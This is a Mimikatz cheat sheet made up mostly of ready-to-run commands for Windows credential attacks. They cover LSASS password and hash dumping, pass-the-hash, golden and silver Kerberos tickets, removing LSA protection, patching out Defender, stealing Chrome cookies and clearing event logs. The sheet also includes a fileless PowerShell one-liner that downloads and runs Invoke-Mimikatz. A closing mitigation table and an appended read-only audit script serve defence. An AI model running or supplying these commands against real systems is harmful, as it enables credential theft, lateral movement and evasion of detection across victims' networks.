# Mimikatz — Commands

## Usage

Interactive (from downloaded mimikatz.exe):

```
mimikatz.exe
privilege::debug
```

If successful, you can interact with LSASS.

mimikatz.exe (command line):

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit
```

PowerShell without touching disk:

```
powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('https://.../Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
```

If LSASS is protected:

```
mimikatz.exe "!+" "!processprotect /process:lsass.exe /unprotect"
```

## Mimikatz commands

| Command | Purpose |
|---------|---------|
| privilege::debug | Enable debug privilege (required for most actions) |
| token::whoami | Show current token/user |
| token::elevate | Try to elevate to SYSTEM |
| exit | Quit Mimikatz |
| version | Show version info |
| cls | Clear screen |
| log | Start logging to file (default: mimikatz.log) |

## Credential Extraction

Dump all logon passwords (cleartext if WDigest enabled):

```
sekurlsa::logonpasswords
```

Dump only NTLM hashes:

```
sekurlsa::msv
```

Dump Kerberos tickets:

```
sekurlsa::tickets
```

Dump DPAPI master keys:

```
dpapi::masterkey /in:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SID\..."
```

Extract from LSASS dump file (offline):

```
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```

WDigest re-enable (Windows 8.1/2012R2+):

```
privilege::debug
sekurlsa::wdigest
# Reboot required after registry change
```

## Pass-the-Hash / Over-Pass-the-Hash

Pass-the-Hash (use NTLM hash directly):

```
sekurlsa::pth /user:Administrator /domain:contoso.com /ntlm:hashhere /run:cmd.exe
```

Over-Pass-the-Hash (generate Kerberos ticket from hash):

```
sekurlsa::pth /user:Admin /domain:DOMAIN /ntlm:hash /run:cmd.exe
```

Pass-the-Hash with RC4 or AES keys:

```
sekurlsa::pth /user:Admin /domain:DOMAIN /aes256:key /run:cmd.exe
```

## Kerberos Attacks (Pass-the-Ticket, Golden Ticket)

List all Kerberos tickets in memory:

```
kerberos::list
```

Pass-the-Ticket (inject ticket from file):

```
kerberos::ptt ticket.kirbi
```

Export all tickets to files:

```
sekurlsa::tickets /export
```

Create a Golden Ticket (KRBTGT hash required):

```
kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /id:500 /ptt
```

Create a Silver Ticket (service-specific):

```
kerberos::golden /user:User /domain:contoso.com /sid:S-1-5-21-... /target:web.contoso.com /service:HTTP /rc4:hash /ptt
```

Purge all Kerberos tickets:

```
kerberos::purge
```

## LSASS Protection Bypass

Disable LSA Protection (RunAsPPL):

```
!+
!processprotect /process:lsass.exe /unprotect
```

Bypass Credential Guard (Windows 10+): limited success; requires reboot to disable normally. Use minidump approach instead.

Dump LSASS without touching LSASS (RPC method):

```
lsadump::sam
lsadump::secrets
```

## Miscellaneous Modules

Dump SAM database (local users):

```
lsadump::sam
```

Dump LSA secrets (service passwords, autologon):

```
lsadump::secrets
```

Dump cached domain credentials (mscash):

```
lsadump::cache
```

Dump DPAPI backup keys:

```
lsadump::backupkeys /system:dc.contoso.com /export
```

Patch Windows (e.g., disable Defender):

```
misc::patch
```

Extract Chrome/Edge cookies:

```
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
```

Clear system event log:

```
event::clear
```

Create a process with stolen token:

```
token::elevate /domainadmin
process::start cmd.exe
```

## Logging & Automation

Start logging before attacks:

```
log
log C:\temp\mimikatz_output.log
```

Run scripted commands:

```
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "lsadump::sam" "exit" >> output.txt
```

PowerShell scripted extraction:

```
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords" "exit"'
```

## Defense & Detection

| Attack | Mitigation |
|--------|------------|
| Credential dumping | Enable LSA Protection (RunAsPPL), Credential Guard |
| WDigest cleartext | Disable WDigest (reg: UseLogonCredential = 0) |
| Pass-the-Hash | Require Kerberos, restrict admin logins, use Protected Users group |
| Golden Ticket | Regularly rotate KRBTGT password (twice), use domain controllers as RODC |
| Pass-the-Ticket | Enable Kerberos Armoring (FAST), use Protected Users |
| LSASS access | Block SeDebugPrivilege for non-admins, enable Defender ASR rules |
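As an added example (not part of the cheat sheet), the following PowerShell audits a host for the controls in the Defense & Detection table: WDigest caching, LSA Protection, Credential Guard, the Defender ASR rule that blocks credential theft from LSASS and, when the ActiveDirectory RSAT module is present, KRBTGT password age and Protected Users membership. The 180-day KRBTGT threshold is an assumed policy value.

```powershell
# Added defensive audit (not part of the original cheat sheet). Run from an
# elevated PowerShell prompt on the host being checked.
function Get-RegValue {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding {
    param([string]$Control, [bool]$Ok, [string]$Detail)
    $findings.Add([pscustomobject]@{
        Control = $Control; Status = $(if ($Ok) { 'OK' } else { 'WEAK' }); Detail = $Detail })
}

# WDigest: sekurlsa::logonpasswords only yields cleartext when UseLogonCredential = 1.
# Value absent or 0 is the hardened state on Windows 8.1 / 2012 R2 and later.
$wd = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' 'UseLogonCredential'
Add-Finding 'WDigest cleartext caching' ($null -eq $wd -or $wd -eq 0) "UseLogonCredential = $wd"

# LSA Protection (RunAsPPL): 1 = enabled, 2 = enabled with UEFI lock.
$ppl = Get-RegValue 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' 'RunAsPPL'
Add-Finding 'LSA Protection (RunAsPPL)' ($ppl -in @(1, 2)) "RunAsPPL = $ppl"

# Credential Guard: Win32_DeviceGuard lists service id 1 when it is running.
$dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
Add-Finding 'Credential Guard' ([bool]($dg -and ($dg.SecurityServicesRunning -contains 1))) "SecurityServicesRunning = $($dg.SecurityServicesRunning -join ',')"

# Defender ASR rule "Block credential stealing from the Windows local security authority subsystem".
# Action 1 = Block; 2 = Audit only; absent = not configured.
$lsassRule = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'
$mp = Get-MpPreference -ErrorAction SilentlyContinue
$action = $null
if ($mp) {
    for ($i = 0; $i -lt $mp.AttackSurfaceReductionRules_Ids.Count; $i++) {
        if ($mp.AttackSurfaceReductionRules_Ids[$i] -eq $lsassRule) { $action = $mp.AttackSurfaceReductionRules_Actions[$i] }
    }
}
Add-Finding 'ASR: block LSASS credential theft' ($action -eq 1) "Action = $action"

# Domain-level checks need the ActiveDirectory RSAT module; skipped when absent.
# The 180-day rotation threshold is an assumed policy value, not taken from the page.
if (Get-Command Get-ADUser -ErrorAction SilentlyContinue) {
    $krbtgt = Get-ADUser krbtgt -Properties PasswordLastSet
    $ageDays = ((Get-Date) - $krbtgt.PasswordLastSet).Days
    Add-Finding 'KRBTGT password age' ($ageDays -le 180) "$ageDays days since last set"
    $pu = @(Get-ADGroupMember 'Protected Users' -ErrorAction SilentlyContinue)
    Add-Finding 'Protected Users membership' ($pu.Count -gt 0) "$($pu.Count) member(s)"
}

$findings | Format-Table -AutoSize
```

Any row reported as WEAK maps directly to a mitigation in the table above; the registry-based rows reflect the persisted setting, so a RunAsPPL or WDigest change that still awaits a reboot shows its post-reboot state.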
